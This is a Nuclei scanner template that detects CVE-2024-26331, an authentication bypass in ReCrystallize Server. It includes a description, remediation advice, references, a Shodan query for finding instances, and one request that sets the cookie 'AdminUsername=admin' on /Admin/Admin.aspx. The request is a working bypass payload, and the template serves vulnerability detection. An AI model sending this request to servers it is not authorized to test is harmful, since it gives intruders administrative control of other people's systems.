id: CVE-2024-26331 info: name: ReCrystallize Server - Authentication Bypass author: Carson Chan severity: high description: | This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. impact: | Unauthenticated attackers can bypass authentication by manipulating the AdminUsername cookie to gain administrative access to ReCrystallize Server. remediation: | Update ReCrystallize Server to a patched version that addresses CVE-2024-26331. reference: - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm - https://github.com/Ostorlab/KEV classification: epss-score: 0.49322 epss-percentile: 0.9877 metadata: verified: true max-request: 1 shodan-query: title:"ReCrystallize" tags: cve,recrystallize,auth-bypass,cve2024,vuln http: - method: GET path: - "{{BaseURL}}/Admin/Admin.aspx" headers: Cookie: "AdminUsername=admin" matchers-condition: and matchers: - type: word part: body words: - "ReCrystallize Server Administration" - "License Status:" - "System Info" condition: and - type: status status: - 200 # digest: 4b0a00483046022100a4f5dedf0d086f7c18a4e2a93ec7750615a5c5527dc00b202e4c004c762d9918022100f8b9bfdc3f691a2f21fb5f4908913b837bed497e3c42eb3a4058c9d88c20ca3e:922c64590222798bb761d5b6d8e72950